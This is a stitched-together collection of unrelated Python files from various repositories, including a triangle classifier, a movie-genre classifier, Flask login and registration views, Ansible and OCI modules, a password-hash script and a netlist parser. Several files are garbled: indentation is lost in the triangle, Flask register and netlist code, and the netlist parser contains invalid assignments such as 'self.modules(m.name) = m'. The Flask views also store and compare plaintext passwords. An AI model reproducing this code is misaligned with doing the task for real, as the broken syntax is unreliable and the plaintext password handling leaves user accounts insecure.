if n1 == n2 and n2 == n3:
print('Esse triângulo será EQUILÁTERO.')
elif n1 == n2 or n1 == n3:
print('Esse triângulo será ISÓSCELES.')
elif n1 != n2 and n2 != n3:
print('Esse triângulo será ESCALENO.')
else:
print('\033[30mCom essas medidas NÃO É POSSÍVEL montarmos um triângulo!\033[m')
# Forma mais complexa e desnecessária que acabei fazendo
''' if n1 == n2 and n2 == n3 and n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[35mEsse triângulo será EQUILÁTERO!\033[m')
elif n1 == n2 or n1 == n3 and n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[35mEsse triângulo será ISÓSCELES!\033[m')
elif n1 != n2 and n2 != n3 and n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[35mEsse triângulo será ESCALENO!\033[m') '''
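The same classification logic packaged as a testable pure function (a refactoring sketch, not part of the exercise as submitted):

```python
def classify_triangle(n1: float, n2: float, n3: float) -> str:
    # Triangle inequality: each side must be shorter than the sum of the others.
    if not (n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2):
        return 'not a triangle'
    if n1 == n2 == n3:
        return 'equilateral'
    if n1 == n2 or n1 == n3 or n2 == n3:
        return 'isosceles'
    return 'scalene'


print(classify_triangle(3, 3, 3))  # equilateral
print(classify_triangle(3, 3, 5))  # isosceles
print(classify_triangle(3, 4, 5))  # scalene
print(classify_triangle(1, 2, 9))  # not a triangle
```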
# ---- file: make_standalone_html.py (repo: peli-pro/coldcard_address_generator, license: MIT) ----
from pathlib import Path
'''
This script creates a new HTML file with the JavaScript code placed inline,
producing a standalone HTML page.
'''

src = Path.cwd() / 'coldcard_address_generator_html.html'
dest = Path.cwd() / 'coldcard_address_generator_html_standalone.html'
dest2 = Path.cwd() / 'index.html'  # for github pages

string = '<script src="js/coldcard_address_generator_html.js"></script>'


def main():
    with open(src) as s:
        source = s.readlines()
    source = replace(source, '<script src="js/coldcard_address_generator_html.js"></script>', Path.cwd() / 'js' / 'coldcard_address_generator_html.js')
    source = replace(source, '<script type="module" src="js/bip32.js"></script>', Path.cwd() / 'js' / 'bip32.js')
    source = replace(source, '<script type="module" src="js/bitcoinjs-lib.js"></script>', Path.cwd() / 'js' / 'bitcoinjs-lib.js')
    with open(dest, 'w') as d:
        for line in source:
            d.write(line)
    with open(dest2, 'w') as d:
        for line in source:
            d.write(line)


def replace(string_arr, find_str, replacement_file):
    out = []
    with open(replacement_file) as r:
        rep = r.read()
    for line in string_arr:
        if find_str in line:
            out.append('<script>' + rep + '</script>\n')
            print()
        else:
            out.append(line)
    return out


if __name__ == '__main__':
    main()
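The `replace` helper swaps a `<script src=…>` reference for the referenced file's contents wrapped in inline `<script>` tags. Its behavior, demonstrated end to end on throwaway files (the paths and JS content here are temporary fixtures, not the project's real ones):

```python
from pathlib import Path
import tempfile


def inline_script(lines, find_str, js_path):
    """Same idea as replace() above: substitute any line containing
    find_str with the JS file's contents wrapped in <script> tags."""
    rep = Path(js_path).read_text()
    return ['<script>' + rep + '</script>\n' if find_str in line else line
            for line in lines]


with tempfile.TemporaryDirectory() as tmp:
    js = Path(tmp) / 'app.js'
    js.write_text('console.log("hi");')
    html = ['<html>\n', '<script src="app.js"></script>\n', '</html>\n']
    out = inline_script(html, '<script src="app.js"></script>', js)
    print(out[1])  # <script>console.log("hi");</script>
```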
# ---- file: movieClass.py (repo: qedseung/Movie-Classifier, license: MIT) ----
import sys, numpy
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import MultinomialNB

# 0=drama, 1=comedy, 2=animated, 3=action/adventure


def random_forest_class(raw_test_set):
    x_train = []
    y_train = []
    count = 0
    vectorizer = TfidfVectorizer(analyzer='word', stop_words='english', max_features=1024)
    with open("movieTraining2.txt", "r") as mtf:
        for line in mtf:
            temp = line.split("||")
            x_train.append(temp[4])
            y_train.append(temp[0])
            count += 1
            '''
            if count==5:
                raw_test_set.append(temp[3])
            elif count==127:
                raw_test_set.append(temp[3])
                print(temp[1])
            elif count==157:
                raw_test_set.append(temp[3])
                print(temp[1])
            elif count==394:
                raw_test_set.append(temp[3])
            '''
    train_data_feat = vectorizer.fit_transform(x_train).toarray()
    randoforest = RandomForestClassifier(n_estimators=100)
    randoforest = randoforest.fit(train_data_feat, y_train)
    test_data_feat = vectorizer.transform(raw_test_set).toarray()
    result = randoforest.predict(test_data_feat)
    return result
    # print(len(y_train), len(raw_test_set))
    # print(x_train[220])


def naive_bayes_class(raw_test_set):
    x_train = []
    y_train = []
    count = 0
    vectorizer = TfidfVectorizer(analyzer='word', stop_words='english', max_features=1024)
    with open("movieTraining2.txt", "r") as mtf:
        for line in mtf:
            temp = line.split("||")
            x_train.append(temp[4])
            y_train.append(temp[1])
            count += 1
            '''
            if count==5:
                raw_test_set.append(temp[3])
            elif count==127:
                raw_test_set.append(temp[3])
                print(temp[1])
            elif count==157:
                raw_test_set.append(temp[3])
                print(temp[1])
            elif count==394:
                raw_test_set.append(temp[3])
            '''
    train_data_feat = vectorizer.fit_transform(x_train).toarray()
    nb = MultinomialNB()
    nb = nb.fit(train_data_feat, y_train)
    test_data_feat = vectorizer.transform(raw_test_set).toarray()
    result = nb.predict(test_data_feat)
    return result


def int2class(lizt, bol):
    if bol:
        for i in lizt:
            if int(i) == 0:
                print('drama')
            elif int(i) == 1:
                print('comedy')
            elif int(i) == 2:
                print('animated')
            elif int(i) == 3:
                print('action')
            elif int(i) == 4:
                print('horror')
    else:
        for i in lizt:
            print(i)


rts = [
    "When Dipper and Mabel Pines get sent to their great-uncle Stan's shop in Gravity Falls, Oregon for the summer, they think it will be boring. But when Dipper find a strange journal in the woods, they learn about some strange secrets about the town. Welcome to Gravity Falls. Just north of Normal, west of Weird.",
    "When chemistry teacher Walter White is diagnosed with Stage III cancer and given only two years to live, he decides he has nothing to lose. He lives with his teenage son, who has cerebral palsy, and his wife, in New Mexico. Determined to ensure that his family will have a secure future, Walt embarks on a career of drugs and crime. He proves to be remarkably proficient in this new world as he begins manufacturing and selling methamphetamine with one of his former students. The series tracks the impacts of a fatal diagnosis on a regular, hard working man, and explores how a fatal diagnosis affects his morality and transforms him into a major player of the drug trade.",
    "A 19th century Western. Chon Wang is a clumsy Imperial Guard to the Emperor of China. When Princess Pei Pei is kidnapped from the Forbidden City, Wang feels personally responsible and insists on joining the guards sent to rescue the Princess, who has been whisked away to the United States. In Nevada and hot on the trail of the kidnappers, Wang is separated from the group and soon finds himself an unlikely partner with Roy O'Bannon, a small time robber with delusions of grandeur. Together, the two forge onto one misadventure after another.",
    "A former lawyer attends a community college when it is discovered he faked his bachelor degree. In an attempt to get with a student in his Spanish class he forms a Spanish study group. To his surprise more people attend the study group and the group of misfits form an unlikely community.",
    "A Michigan farmer and a prospector form a partnership in the California gold country. Their adventures include buying and sharing a wife, hijacking a stage, kidnaping six prostitutes, and turning their mining camp into a boomtown. Along the way there is plenty of drinking, gambling, and singing. They even find time to do some creative gold mining.",
    "Dory is a wide-eyed, blue tang fish who suffers from memory loss every 10 seconds or so. The one thing she can remember is that she somehow became separated from her parents as a child. With help from her friends Nemo and Marlin, Dory embarks on an epic adventure to find them. Her journey brings her to the Marine Life Institute, a conservatory that houses diverse ocean species.",
    "A US research station, Antarctica, early-winter 1982. The base is suddenly buzzed by a helicopter from the nearby Norwegian research station. They are trying to kill a dog that has escaped from their base. After the destruction of the Norwegian chopper the members of the US team fly to the Norwegian base, only to discover them all dead or missing. They do find the remains of a strange creature the Norwegians burned. The Americans take it to their base and deduce that it is an alien life form. After a while it is apparent that the alien can take over and assimilate into other life forms, including humans, and can spread like a virus.",
    "This is a shit movie"
]

# res = naive_bayes_class(rts)
# res = random_forest_class(rts)
# x = []
# print("Please Describe a Story:")
# x.append(input().strip())
res = naive_bayes_class(rts)
int2class(res, True)
res = random_forest_class(rts)
int2class(res, False)
# ---- file: api/views/view_users.py (repo: AlanZhl/NodUleS, license: MIT) ----
from flask import Blueprint, jsonify, request, session
from pymongo import DESCENDING
from api.views import users
from api import collection_users
@users.route("/api/register", methods=["POST"])
def user_register():
if request.method == "POST":
data = request.get_json()
email = data['email']
password = data['password']
confirm = data['confirm']
user_name = data["user_name"]
if not all([email, password, confirm]):
return jsonify("Sorry, all the input fields are required.")
if password != confirm:
return jsonify("Inconsistent passwords.")
try:
        existent_user = collection_users.find_one({"email": email}, projection={"password": False})
        if existent_user is not None:
            return jsonify("A user with this email already exists. Please try a new one.")
        # default role: student (user_id >= 3001)
        max_id = 3000
        for user in collection_users.find(filter={}, sort=[("user_id", DESCENDING)], limit=1, projection={"user_id": True}):
            if user["user_id"] > max_id:
                max_id = user["user_id"]
        new_user = {
            "user_id": max_id + 1, "user_name": user_name, "email": email,
            "password": password, "role": 0,
            "enrolled_courses": ["IT5007", "IT5002"],
            "favored_courses": [],
            "taken_courses": ["IT5001", "IT5003"],
            "about_me": "",
        }
        collection_users.insert_one(new_user)
        return jsonify("Registration succeeded!")
    except Exception as e:
        print(e)
        return jsonify("Registration failed due to server error.")


@users.route("/api/login", methods=["GET", "POST"])
def user_login():
    if request.method == "POST":
        data = request.get_json()
        email = data["email"]
        remember = data["remember"]
        password = str(data["password"])
        if not email or not password:
            return jsonify({"status": 0, "message": "Invalid input."})
        # ip = request.remote_addr  # for limiting login attempts
        check_comb = {"email": email, "password": password}
        try:
            user = collection_users.find_one(check_comb, projection={"user_id": True, "user_name": True})
            print('Succeed: login matched.')
            session[email] = True
            session.permanent = True
            session["user_id"] = user["user_id"]
            session["user_name"] = user["user_name"]
            return jsonify({"status": 1, "message": 'Logged in successfully!'})
        except Exception as e:
            print(e)
            print("Login Error: failed to find a user with the given email and password")
            return jsonify({"status": 0, "message": "Mismatch on email or password."})


@users.route("/api/users/info", methods=["POST"])
def get_userinfo():
    user_id = session.get("user_id")
    if user_id is None:
        print("getUserInfo Error: probably no user has logged in.")
        return jsonify({"user_id": -1})
    try:
        user = collection_users.find_one({"user_id": user_id}, projection={"_id": False, "password": False})
        print(f"Succeed: user {user_id} found." if user is not None else f"Failed: cannot find user {user_id}!")
        return jsonify(user) if user is not None else jsonify({"user_id": -1})
    except Exception as e:
        print(e)
        print(f"getUserInfo Error: user with id {user_id} is not found.")
        return jsonify({"user_id": -1})


@users.route('/api/logout', methods=["POST"])
def logout():
    if request.method == 'POST':
        print("session to be deleted: ", session)  # for tests only
        if not session:
            print("Logout Error: no session currently.")
            return jsonify({"status": 0})
        user_name = session.get("user_name")
        session.clear()
        print(f"Succeed: {user_name} logged out successfully. Remaining session info: ", session)  # for tests only
        return jsonify({"status": 1, "user_name": user_name})


@users.route("/api/users/set_favor", methods=["POST"])
def set_favoredCourse():
    data = request.get_json()
    user_id = data["user_id"]
    course_id = data["course_id"]
    status = data["status"]
    try:
        favored_courses = collection_users.find_one({"user_id": user_id}, projection={"favored_courses": True})["favored_courses"]
        if status == 0 and course_id in favored_courses:
            favored_courses.remove(course_id)
            collection_users.update_one({"user_id": user_id}, {"$set": {"favored_courses": favored_courses}})
        elif status == 1 and course_id not in favored_courses:
            favored_courses.append(course_id)
            collection_users.update_one({"user_id": user_id}, {"$set": {"favored_courses": favored_courses}})
        else:
            print("Backend record of favored courses mismatches the frontend!")
            return jsonify({"status": -1})
        return jsonify({"status": 1})
    except Exception as e:
        print(e)
        return jsonify({"status": -1})
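The read-modify-write sequence in `set_favoredCourse` above (fetch the list, mutate it, `$set` it back) can race with concurrent requests. MongoDB's `$addToSet` and `$pull` update operators perform the add/remove atomically in a single call. A minimal sketch of that alternative — the standalone function shape and name are mine, not part of the app:

```python
def set_favored_course(collection, user_id, course_id, status):
    # Build one atomic update instead of fetching the list,
    # mutating it in Python, and writing the whole list back.
    if status == 1:
        op = {"$addToSet": {"favored_courses": course_id}}  # add only if absent
    else:
        op = {"$pull": {"favored_courses": course_id}}      # remove if present
    return collection.update_one({"user_id": user_id}, op)
```

With a real pymongo collection this replaces both branches of the original `if`/`elif`, and the frontend/backend mismatch check could instead inspect `modified_count` on the returned result.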
# ---- File: ansible-devel/test/units/utils/test_display.py (repo: satishcarya/ansible, license: MIT) ----
# -*- coding: utf-8 -*-
# (c) 2020 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type

from units.compat.mock import MagicMock

import pytest

from ansible.module_utils.six import PY3
from ansible.utils.display import Display, get_text_width, initialize_locale


def test_get_text_width():
    initialize_locale()
    assert get_text_width(u'コンニチハ') == 10
    assert get_text_width(u'abコcd') == 6
    assert get_text_width(u'café') == 4
    assert get_text_width(u'four') == 4
    assert get_text_width(u'\u001B') == 0
    assert get_text_width(u'ab\u0000') == 2
    assert get_text_width(u'abコ\u0000') == 4
    assert get_text_width(u'🚀🐮') == 4
    assert get_text_width(u'\x08') == 0
    assert get_text_width(u'\x08\x08') == 0
    assert get_text_width(u'ab\x08cd') == 3
    assert get_text_width(u'ab\x1bcd') == 3
    assert get_text_width(u'ab\x7fcd') == 3
    assert get_text_width(u'ab\x94cd') == 3

    pytest.raises(TypeError, get_text_width, 1)
    pytest.raises(TypeError, get_text_width, b'four')


@pytest.mark.skipif(PY3, reason='Fallback only happens reliably on py2')
def test_get_text_width_no_locale():
    pytest.raises(EnvironmentError, get_text_width, u'🚀🐮')


def test_Display_banner_get_text_width(monkeypatch):
    initialize_locale()
    display = Display()
    display_mock = MagicMock()
    monkeypatch.setattr(display, 'display', display_mock)

    display.banner(u'🚀🐮', color=False, cows=False)
    args, kwargs = display_mock.call_args
    msg = args[0]
    stars = u' %s' % (75 * u'*')
    assert msg.endswith(stars)


@pytest.mark.skipif(PY3, reason='Fallback only happens reliably on py2')
def test_Display_banner_get_text_width_fallback(monkeypatch):
    display = Display()
    display_mock = MagicMock()
    monkeypatch.setattr(display, 'display', display_mock)

    display.banner(u'🚀🐮', color=False, cows=False)
    args, kwargs = display_mock.call_args
    msg = args[0]
    stars = u' %s' % (77 * u'*')
    assert msg.endswith(stars)
# ---- File: plugins/modules/oci_network_byoip_range_actions.py (repo: A7rMtWE57x/oci-ansible-collection, license: Apache-2.0) ----
#!/usr/bin/python
# Copyright (c) 2017, 2020 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["preview"],
    "supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_network_byoip_range_actions
short_description: Perform actions on a ByoipRange resource in Oracle Cloud Infrastructure
description:
    - Perform actions on a ByoipRange resource in Oracle Cloud Infrastructure.
    - For I(action=advertise), initiate route advertisements for the Byoip Range prefix.
      The prefix must be in PROVISIONED state.
    - For I(action=validate), submit the Byoip Range for validation. This presumes the user has
      updated their IP registry record in accordance with validation requirements.
    - For I(action=withdraw), stop route advertisements for the Byoip Range prefix.
version_added: "2.9"
author: Oracle (@oracle)
options:
    byoip_range_id:
        description:
            - The OCID of the Byoip Range object.
        type: str
        aliases: ["id"]
        required: true
    action:
        description:
            - The action to perform on the ByoipRange.
        type: str
        required: true
        choices:
            - "advertise"
            - "validate"
            - "withdraw"
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Perform action advertise on byoip_range
  oci_network_byoip_range_actions:
    byoip_range_id: ocid1.byoiprange.oc1..xxxxxxEXAMPLExxxxxx
    action: advertise

- name: Perform action validate on byoip_range
  oci_network_byoip_range_actions:
    byoip_range_id: ocid1.byoiprange.oc1..xxxxxxEXAMPLExxxxxx
    action: validate

- name: Perform action withdraw on byoip_range
  oci_network_byoip_range_actions:
    byoip_range_id: ocid1.byoiprange.oc1..xxxxxxEXAMPLExxxxxx
    action: withdraw
"""
RETURN = """
byoip_range:
    description:
        - Details of the ByoipRange resource acted upon by the current operation
    returned: on success
    type: complex
    contains:
        cidr_block:
            description:
                - The address range the user is on-boarding.
            returned: on success
            type: string
            sample: cidr_block_example
        compartment_id:
            description:
                - The OCID of the compartment containing the Byoip Range.
            returned: on success
            type: string
            sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
        defined_tags:
            description:
                - Defined tags for this resource. Each key is predefined and scoped to a
                  namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
                - "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
            returned: on success
            type: dict
            sample: {'Operations': {'CostCenter': 'US'}}
        display_name:
            description:
                - A user-friendly name. Does not have to be unique, and it's changeable. Avoid
                  entering confidential information.
            returned: on success
            type: string
            sample: display_name_example
        freeform_tags:
            description:
                - Free-form tags for this resource. Each tag is a simple key-value pair with no
                  predefined name, type, or namespace. For more information, see L(Resource
                  Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
                - "Example: `{\\"Department\\": \\"Finance\\"}`"
            returned: on success
            type: dict
            sample: {'Department': 'Finance'}
        id:
            description:
                - The Oracle ID (OCID) of the Byoip Range.
            returned: on success
            type: string
            sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
        lifecycle_details:
            description:
                - The Byoip Range's current substate.
            returned: on success
            type: string
            sample: CREATING
        lifecycle_state:
            description:
                - The Byoip Range's current state.
            returned: on success
            type: string
            sample: INACTIVE
        time_created:
            description:
                - The date and time the Byoip Range was created, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
                - "Example: `2016-08-25T21:10:29.600Z`"
            returned: on success
            type: string
            sample: 2016-08-25T21:10:29.600Z
        time_validated:
            description:
                - The date and time the Byoip Range was validated, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
                - "Example: `2016-08-25T21:10:29.600Z`"
            returned: on success
            type: string
            sample: 2016-08-25T21:10:29.600Z
        time_advertised:
            description:
                - The date and time the Byoip Range was advertised, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
                - "Example: `2016-08-25T21:10:29.600Z`"
            returned: on success
            type: string
            sample: 2016-08-25T21:10:29.600Z
        time_withdrawn:
            description:
                - The date and time the Byoip Range was withdrawn, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
                - "Example: `2016-08-25T21:10:29.600Z`"
            returned: on success
            type: string
            sample: 2016-08-25T21:10:29.600Z
        validation_token:
            description:
                - This is an internally generated ASCII string that the user will then use as part of the validation process. Specifically, they will need to
                  add the token string generated by the service to their Internet Registry record.
            returned: on success
            type: string
            sample: validation_token_example
    sample: {
        "cidr_block": "cidr_block_example",
        "compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
        "defined_tags": {'Operations': {'CostCenter': 'US'}},
        "display_name": "display_name_example",
        "freeform_tags": {'Department': 'Finance'},
        "id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
        "lifecycle_details": "CREATING",
        "lifecycle_state": "INACTIVE",
        "time_created": "2016-08-25T21:10:29.600Z",
        "time_validated": "2016-08-25T21:10:29.600Z",
        "time_advertised": "2016-08-25T21:10:29.600Z",
        "time_withdrawn": "2016-08-25T21:10:29.600Z",
        "validation_token": "validation_token_example"
    }
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
    oci_common_utils,
    oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
    OCIActionsHelperBase,
    get_custom_class,
)
try:
    from oci.work_requests import WorkRequestClient
    from oci.core import VirtualNetworkClient

    HAS_OCI_PY_SDK = True
except ImportError:
    HAS_OCI_PY_SDK = False
class ByoipRangeActionsHelperGen(OCIActionsHelperBase):
    """
    Supported actions:
        advertise
        validate
        withdraw
    """

    def __init__(self, *args, **kwargs):
        super(ByoipRangeActionsHelperGen, self).__init__(*args, **kwargs)
        self.work_request_client = WorkRequestClient(
            self.client._config, **self.client._kwargs
        )

    @staticmethod
    def get_module_resource_id_param():
        return "byoip_range_id"

    def get_module_resource_id(self):
        return self.module.params.get("byoip_range_id")

    def get_get_fn(self):
        return self.client.get_byoip_range

    def get_resource(self):
        return oci_common_utils.call_with_backoff(
            self.client.get_byoip_range,
            byoip_range_id=self.module.params.get("byoip_range_id"),
        )

    def advertise(self):
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.advertise_byoip_range,
            call_fn_args=(),
            call_fn_kwargs=dict(
                byoip_range_id=self.module.params.get("byoip_range_id"),
            ),
            waiter_type=oci_wait_utils.NONE_WAITER_KEY,
            operation="{0}_{1}".format(
                self.module.params.get("action").upper(),
                oci_common_utils.ACTION_OPERATION_KEY,
            ),
            waiter_client=self.get_waiter_client(),
            resource_helper=self,
            wait_for_states=self.get_action_desired_states(
                self.module.params.get("action")
            ),
        )

    def validate(self):
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.validate_byoip_range,
            call_fn_args=(),
            call_fn_kwargs=dict(
                byoip_range_id=self.module.params.get("byoip_range_id"),
            ),
            waiter_type=oci_wait_utils.WORK_REQUEST_WAITER_KEY,
            operation="{0}_{1}".format(
                self.module.params.get("action").upper(),
                oci_common_utils.ACTION_OPERATION_KEY,
            ),
            waiter_client=self.work_request_client,
            resource_helper=self,
            wait_for_states=oci_common_utils.get_work_request_completed_states(),
        )

    def withdraw(self):
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.withdraw_byoip_range,
            call_fn_args=(),
            call_fn_kwargs=dict(
                byoip_range_id=self.module.params.get("byoip_range_id"),
            ),
            waiter_type=oci_wait_utils.NONE_WAITER_KEY,
            operation="{0}_{1}".format(
                self.module.params.get("action").upper(),
                oci_common_utils.ACTION_OPERATION_KEY,
            ),
            waiter_client=self.get_waiter_client(),
            resource_helper=self,
            wait_for_states=self.get_action_desired_states(
                self.module.params.get("action")
            ),
        )
ByoipRangeActionsHelperCustom = get_custom_class("ByoipRangeActionsHelperCustom")
class ResourceHelper(ByoipRangeActionsHelperCustom, ByoipRangeActionsHelperGen):
    pass
def main():
    module_args = oci_common_utils.get_common_arg_spec(
        supports_create=False, supports_wait=True
    )
    module_args.update(
        dict(
            byoip_range_id=dict(aliases=["id"], type="str", required=True),
            action=dict(
                type="str", required=True, choices=["advertise", "validate", "withdraw"]
            ),
        )
    )

    module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)

    if not HAS_OCI_PY_SDK:
        module.fail_json(msg="oci python sdk required for this module.")

    resource_helper = ResourceHelper(
        module=module,
        resource_type="byoip_range",
        service_client_class=VirtualNetworkClient,
        namespace="core",
    )

    result = resource_helper.perform_action(module.params.get("action"))

    module.exit_json(**result)


if __name__ == "__main__":
    main()
# ---- File: Task/XML-XPath/Python/xml-xpath-3.py (repo: LaudateCorpus1/RosettaCodeData, license: Info-ZIP) ----
from lxml import etree
xml = open('inventory.xml').read()
doc = etree.fromstring(xml)
# or load it directly from the file:
# doc = etree.parse('inventory.xml')

# Return first item
item1 = doc.xpath("//section[1]/item[1]")

# Print each price
for p in doc.xpath("//price"):
    # could raise an exception on missing text or an invalid float() conversion
    print("{0:0.2f}".format(float(p.text)))

names = doc.xpath("//name")  # list of names
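If lxml is unavailable, the standard library's `xml.etree.ElementTree` supports a useful subset of XPath (note: no leading `//` on `find` with positional predicates). A sketch using a made-up `inventory.xml` snippet shaped to match the queries above:

```python
import xml.etree.ElementTree as ET

# Made-up document matching the structure the lxml queries above assume.
xml = """<inventory>
  <section><item><name>widget</name><price>3.5</price></item></section>
  <section><item><name>gadget</name><price>7.25</price></item></section>
</inventory>"""

doc = ET.fromstring(xml)
item1 = doc.find("section[1]/item[1]")    # first item of the first section
prices = ["{0:0.2f}".format(float(p.text)) for p in doc.iter("price")]
names = [n.text for n in doc.iter("name")]
print(prices, names)
```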
# ---- File: profile/migrations/0003_globalalert.py (repo: ritstudentgovernment/PawPrints, license: Apache-2.0) ----
# Generated by Django 2.1.3 on 2019-02-12 19:18
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('profile', '0002_auto_20180126_1900'),
    ]

    operations = [
        migrations.CreateModel(
            name='GlobalAlert',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('active', models.BooleanField(default=True)),
                ('content', models.TextField()),
            ],
        ),
    ]
# ---- File: git_diff_ssr2_osm_wrapper.py (repo: obtitus/ssr2_to_osm, license: WTFPL) ----
#!/usr/bin/env python
import sys
import logging
logger = logging.getLogger('utility_to_osm.ssr2.git_diff')

import utility_to_osm.file_util as file_util

from osmapis_stedsnr import OSMstedsnr

if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    # diff is called by git with 7 parameters:
    # path old-file old-hex old-mode new-file new-hex new-mode
    new_file, old_file = sys.argv[1], sys.argv[2]

    logger.info('Reading %s', old_file)
    content = file_util.read_file(old_file)
    old_osm = OSMstedsnr.from_xml(content)

    logger.info('Reading %s', new_file)
    content = file_util.read_file(new_file)
    new_osm = OSMstedsnr.from_xml(content)

    print('\n=== Missing stedsnr ===\n')
    old_stedsnr = sorted(old_osm.stedsnr.keys())
    new_stedsnr = sorted(new_osm.stedsnr.keys())
    for key in old_stedsnr:
        if key not in new_stedsnr:
            print('Diff, %s only in old (missing in new)' % key)
            print(old_osm.stedsnr[key][0])
    for key in new_stedsnr:
        if key not in old_stedsnr:
            print('Diff, %s only in new (missing in old)' % key)
            print(new_osm.stedsnr[key][0])

    print('\n=== Tagging differences ===\n')
    stedsnr = set(old_stedsnr).intersection(new_stedsnr)
    for key in stedsnr:
        old = old_osm.stedsnr[key][0]
        new = new_osm.stedsnr[key][0]

        limit_distance = 1e-5  # FIXME: reasonable?
        old_lat, old_lon = float(old.attribs['lat']), float(old.attribs['lon'])
        new_lat, new_lon = float(new.attribs['lat']), float(new.attribs['lon'])
        if abs(old_lat - new_lat) > limit_distance or abs(old_lon - new_lon) > limit_distance:
            print('Diff in position %s old [%s, %s] != new [%s, %s]' % (key, old_lat, old_lon, new_lat, new_lon))

        for tag_key in old.tags:
            if tag_key not in new.tags:
                print('Diff %s, %s missing in new:' % (key, tag_key))
                print('  old[%s] = %s\n' % (tag_key, old.tags[tag_key]))
        for tag_key in new.tags:
            if tag_key not in old.tags:
                print('Diff %s, %s missing in old:' % (key, tag_key))
                print('  new[%s] = %s\n' % (tag_key, new.tags[tag_key]))

        common_tags = set(old.tags.keys()).intersection(new.tags.keys())
        for tag_key in common_tags:
            if tag_key in ('ssr:date', ):
                continue  # don't care
            o, n = old.tags[tag_key], new.tags[tag_key]
            if o != n:
                print('Diff %s:\n  old[%s] = %s\n  new[%s] = %s\n' % (key, tag_key, o, tag_key, n))
# ---- File: test-data/mkpasswd.py (repo: colorshifter/lsd-members, license: MIT) ----
#!/usr/bin/env python3
import uuid

from passlib.hash import pbkdf2_sha512

password = input('Enter password: ')
password_parts = pbkdf2_sha512.encrypt(password, salt_size=32).split('$')
password = password_parts[4]
salt = password_parts[3]


def convert_b64(value):
    # passlib uses '.' instead of '+' and strips the '=' padding
    return value.replace('.', '+') + '='


print('Password: ' + convert_b64(password))
print('Salt: ' + convert_b64(salt))
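The `.` → `+` substitution exists because passlib stores the salt and digest in an adapted base64 alphabet (`.` in place of `+`, with trailing `=` padding stripped). A standalone copy of the helper — the sample input is made up — illustrates the mapping:

```python
def convert_b64(value):
    # passlib's adapted base64 uses '.' where standard base64 uses '+',
    # and drops the trailing '=' padding; this undoes both
    return value.replace('.', '+') + '='

print(convert_b64('ab.cd'))   # 'ab+cd='
```

Note that appending a single `=` only restores the padding exactly when one pad character was stripped, which is what the script above assumes for its inputs.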
# ---- File: netlist.py (repo: phdbreak/netlist_parser.py, license: Apache-2.0) ----
# Parent tree
# design
# |---> module
# |-----> port/wire
# |-----> instance
# |-----> pin
class design_t:
def __init__(self):
self.modules = dict()
def add_module(self, module_name):
if (module_name in self.modules.keys()):
print 'Error: module (%s) already exisits' % module_name
return None
m = module_t(module_name)
self.modules(m.name) = m
return m
class module_t:
def __init__(self, name):
self.name = name
self.ports = dict()
self.ls_port = list() # port in order
self.wires = dict()
self.instances = dict()
self.params = dict()
self.is_hierarchical = True
self.full_name = self.name
def add_port(self, port_name, direction):
if (port_name in self.ports.keys()):
print 'Error: port (%s) in module (%s) already exists' % (port_name, self.full_name)
return None
p = port_t(port_name, self, direction)
self.ports(p.name) = p
self.ls_port.append(p)
return p
def add_wire(self, wire_name):
if (wire_name in self.wires.keys()):
print 'Error: wire (%s) in module (%s) already exists' % (wire_name, self.full_name)
return None
w = wire_t(wire_name, self)
self.wires(w.name) = w
return w
def add_instance(self, instance_name):
if (instance_name in self.instances.keys()):
print 'Error: instance (%s) in module (%s) already exists' % (instance_name, self.full_name)
return None
n = instance_t(instance_name, self)
self.instances(n.name) = n
return n
def add_param(self, param, default_value):
if (param in self.params.keys()):
print 'Error: param (%s) in module (%s) already exists' % (param, self.full_name)
return 0
self.params(param) = default_value
return 1
# def __eq__(self, other):
# equal = True
# if not (self.name == other.name):
# equal = False
# if not __eq_dict__(self.ports, other.ports):
# equal = False
# if not __eq_dict__(self.instances, other.instances):
# equal = False
# if not __eq_dict__(self.wires, other.wires):
# equal = False
#
# if not equal:
# print 'Error: modules (%s != %s) donot match' % (self, other)
#
# return equal
class instance_t:
'instance of module'
def __init__(self, name, parent_module):
self.name = name
self.parent_module = parent_module
self.pins = dict()
self.master_module = None
self.params = dict()
